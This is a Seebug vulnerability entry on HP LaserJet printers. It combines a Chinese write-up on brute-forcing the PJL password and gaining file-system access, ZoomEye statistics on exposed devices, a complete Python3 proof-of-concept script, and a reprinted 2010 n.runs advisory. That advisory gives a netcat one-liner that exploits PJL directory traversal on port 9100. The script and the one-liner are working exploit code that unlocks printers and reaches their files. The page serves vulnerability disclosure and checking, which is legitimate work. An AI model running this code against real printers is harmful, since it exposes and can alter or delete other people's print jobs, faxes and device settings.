HP LaserJet Directory Traversal in PJL Interface

2014-07-01T00:00:00
ID SSV:70298
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

<body><h1>漏洞分析</h1><p></p> <p><span style="font-size: large"> 密码爆破</span></p> <p style="padding-left: 30px">惠普官方已经在2010年11月的安全通告上发布了漏洞解决办法,用户可以通过禁用 PJL 的文件系统访问权限或重新设置 PJL 密码来解决此问题。但 PJL 的安全密码是范围1-65535的数字,密码认证次数和频率并没有限制,远程攻击者可以通过爆破可以将 PJL 的密码安全保护禁用,进而可绕过密码验证通过 PJL 对打印机内置的文件系统进行读写。文件系统包含后台处理打印作业、收到的传真、日志文件和配置文件。</p> <p style="padding-left: 30px">使用以下 Python3 程序对系统进行漏洞检测:</p> <p></p><!-- Crayon Syntax Highlighter v2.7.1 -->

<!-- [Format Time: 0.0088 seconds] --> <p></p> <p style="padding-left: 30px">如果打印出“PoC OK!”,说明系统存在漏洞。PoC 验证脚本主要分为两个部分。第一部分发送重置密码的PJL指令进行密码爆破,每进行30次密码尝试后发送一次查询当前密码保护的状态的 PJL 指令,直到查询到密码保护被关闭即为爆破成功。爆破过程如图1所示,破解密码过程中返回打印机型号和PJL报文信息。</p> <p><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/1.png"><img class="aligncenter wp-image-2985" src="http://blog.knownsec.com/wp-content/uploads/2015/08/1.png" alt="1" width="700" height="169"></a></p> <p style="text-align: center">图1 Python3脚本爆破过程</p> <p></p> <p style="padding-left: 30px">第二部分发送查询磁盘文件的 PJL 指令,如果指令能够正确获取到目录,则 PJL 具有文件系统的访问权限,如图2所示,即存在漏洞,PoC 验证完成。</p> <p><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/2.png"><img class="aligncenter wp-image-2986" src="http://blog.knownsec.com/wp-content/uploads/2015/08/2.png" alt="2" width="700" height="128"></a></p> <p style="text-align: center">图2 Python3进行PoC验证</p> <p> <span style="font-size: large">打印机信息泄露</span></p> <p style="padding-left: 30px">惠普打印机 File System External Access 的默认设置允许 PJL 命令访问该设备的文件系统。远程攻击者可以借助 PJL 读取任意文件,远程连接打印机并进行遍历目录操作,截图如下:</p> <p><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/3.png"><img class="aligncenter wp-image-2987" src="http://blog.knownsec.com/wp-content/uploads/2015/08/3-300x141.png" alt="3" width="700" height="329"></a></p> <p style="text-align: center">图3 连接远程打印机并遍历目录</p> <p></p> <p style="padding-left: 30px">进入打印机后台,读取目录后,可以进行上传、下载和删除文件的操作,截图如下:</p> <p><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/4.png"><img class="aligncenter wp-image-2988" src="http://blog.knownsec.com/wp-content/uploads/2015/08/4-300x109.png" alt="4" width="700" height="254"></a></p> <p style="text-align: center">图4 下载打印机内部文档</p> <p></p> <p style="text-align: center"><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/5.png"><img class="alignnone wp-image-2989" src="http://blog.knownsec.com/wp-content/uploads/2015/08/5-300x183.png" alt="5" width="700" height="427"></a></p> <p style="text-align: center">图5 删除打印机内文件并进行本地上传</p> <p> <span style="font-size: xx-large">ZoomEye 分析概要</span></p> <p style="padding-left: 30px">通过网络空间搜索引擎 ZoomEye 进行全网搜索,得出目前全球10393台存在文件系统的惠普打印机中受到该漏洞影响的打印机有3625台,占比34.88%。</p> <p><span style="font-size: x-large">受漏洞影响设备型号全球排名 TOP 10</span></p> <p style="padding-left: 30px">受该漏洞影响打印机中 HP LaserJet 4250有424台(11.7%),HP LaserJet 4050有366台(10.1%),HP Color LaserJet 5550有267台(7.3%)。其中 HP LaserJet 系列打印机占所有受影响设备的73.9%。</p> <p><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/6.png"><img class="aligncenter wp-image-2990" src="http://blog.knownsec.com/wp-content/uploads/2015/08/6-300x154.png" alt="6" width="700" height="360"></a></p> <p style="text-align: center">图6 受漏洞影响设备型号全球排名 TOP 10</p> <p> <span style="font-size: x-large"> 受漏洞影响国家全球排名 TOP 10</span></p> <p style="padding-left: 30px">受该漏洞影响的打印机数量全球排名前三分别是:<br> 1、美国2315台,占比63.9%<br> 2、韩国410台,占比11.3%<br> 3、中国302台,占比8.3%</p> <p><a href="http://blog.knownsec.com/wp-content/uploads/2015/08/7.png"><img class="aligncenter wp-image-2991" src="http://blog.knownsec.com/wp-content/uploads/2015/08/7-300x155.png" alt="7" width="700" height="361"></a></p> <p style="text-align: center">图7 受漏洞影响国家全球排名 TOP 10</p> <p> <span style="font-size: xx-large">

</span></p></body>

                                        
                                            
                                                import socket
import sys
 
 
def main():
    if len(sys.argv)&lt;=1:
        print('Parameters error')
        return
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(10)
    s.connect((sys.argv[1],9100))
    s.settimeout(None)
    # 发送读取设备ID的PJL指令
    s.send(('33%-12345X@PJL INFO ID\r\n33%-12345X\r\n').encode('UTF-8'))
    print(s.recv(1024).decode('UTF-8'))
 
    for i in range(1, 65536):
        buf = b''
        # 发送重置密码的PJL指令
        s.send(('33%-12345X@PJL \r\n@PJL JOB PASSWORD=' + str(i) + '\r\n@PJL DEFAULT PASSWORD=0 \r\n@PJL EOJ\r\n33%-12345X\r\n').encode('UTF-8'))
        if i%30 == 0:
            # 发送查询密码保护状态的PJL指令
            s.send(('33%-12345X@PJL \r\n@PJL DINQUIRE PASSWORD\r\n33%-12345X\r\n').encode('UTF-8'))
            while True:
                buf += s.recv(1)
                print(buf)
                try:
                    buf.index(b'\r\n\x0c')
                    try:
                        # 密码保护被禁用
                        buf.index(b'DISABLED')
                        print('password disabled ok!')
                        # 发送查询目录的PJL指令
                        s.send(('33%-12345X@PJL \r\n@PJL FSDIRLIST NAME = "0:\\" ENTRY=1 COUNT=99\r\n33%-12345X\r\n').encode('UTF-8'))
                        buf = b''
                        while True:
                            buf += s.recv(1)
                            print(buf)
                            try:
                                buf.index(b'\r\n\x0c')
                                try:
                                    # 查询成功
                                    buf.index(b'ENTRY')
                                    print('PoC OK!')
                                    return
                                except ValueError:
                                    print('PoC NO!')
                                    return
                            except ValueError:
                                continue
                    except ValueError:
                        print('password disabled faild!')
                    finally:
                        s.close()
                        return
                except ValueError:
                    continue
    s.close()
 
if __name__ == '__main__':
    main()

________________________________________________________________________
另一种PoC
n.runs AG
http://www.nruns.com/                             security(at)nruns.com
n.runs-SA-2010.003                                          16-Nov-2010
________________________________________________________________________

Vendor:         Hewlett-Packard, http://www.hp.com
Affected Products:      Various HP LaserJet MFP devices
                        (See HP advisory [3] for the complete list)
Vulnerability:          Directory Traversal in PJL interface
Risk:                   HIGH
________________________________________________________________________

Vendor communication:

2009/11/25 Initial notification of Hewlett-Packard
2009/11/25 HP confirms receival of advisory
2010/02/05 n.runs AG requests update on the reported issue
2010/02/05 HP notifies n.runs AG that an advisory is in preparation
2010/11/15 Publication of HP advisory
________________________________________________________________________

Overview:

The Printer Job Language (PJL) was developed by Hewlett-Packard to
provide a method for switching printer languages at the job level
and for status exchange between the device and a host computer.
Besides the possibility to view and change parts of the printer&#39;s
configuration or modify control panel messages PJL allows some limited
form of file system access. PJL is used &#34;above&#34; other printer languages
such as PCL and is usually accessible on port 9100. Detailed
information about PJL can be found in the PJL Technical Reference
Manual [1].

Description:

A directory traversal vulnerability has been found in the PJL file
system access interface of various HP LaserJet MFP devices.
File system access through PJL is usually restricted to a specific
part of the file system. Using a pathname such as 0:\..\..\..\ it
is possible to get access to the complete file system of the device.

Proof of Concept:

The following command can be used to reproduce the problem. It lists
all files in the root directoy of the device:

$ python -c &#39;print &#34;\x1b%-12345X () PJL FSDIRLIST NAME=\&#34;0:\\..\\..\\..\\\&#34; \
  ENTRY=1 COUNT=999999\x0d\x0a\x1b%-12345X\x0d\x0a&#34;&#39; | nc 192.168.0.1 9100
@PJL FSDIRLIST NAME=&#34;0:\..\..\..\&#34; ENTRY=1
. TYPE=DIR
.. TYPE=DIR
tmp TYPE=DIR
etc TYPE=DIR
xps TYPE=DIR
dsk_ide2a TYPE=DIR
dsk_ColorIQ TYPE=DIR
dsk_CustomIQ TYPE=DIR
bootdev TYPE=DIR
dsk_jdi TYPE=DIR
dsk_jdi_ss TYPE=DIR
dsk_af TYPE=DIR
lrt TYPE=DIR
webServer TYPE=DIR

Impact:

This vulnerability allows sensitive information to be disclosed
and potentially be modified. This includes spooled print jobs,
received faxes, log files or other settings of the device.

Solution:

See the HP advisory [3] for possible workarounds.
________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of n.runs AG.
________________________________________________________________________

References:
[1]
http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pd
f
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4107
[3]
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0200
4333

This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php
________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security () nruns com for permission. Use of the advisory constitutes
acceptance for use in an &#34;as is&#34; condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.

Copyright 2010 n.runs AG. All rights reserved. Terms of use apply.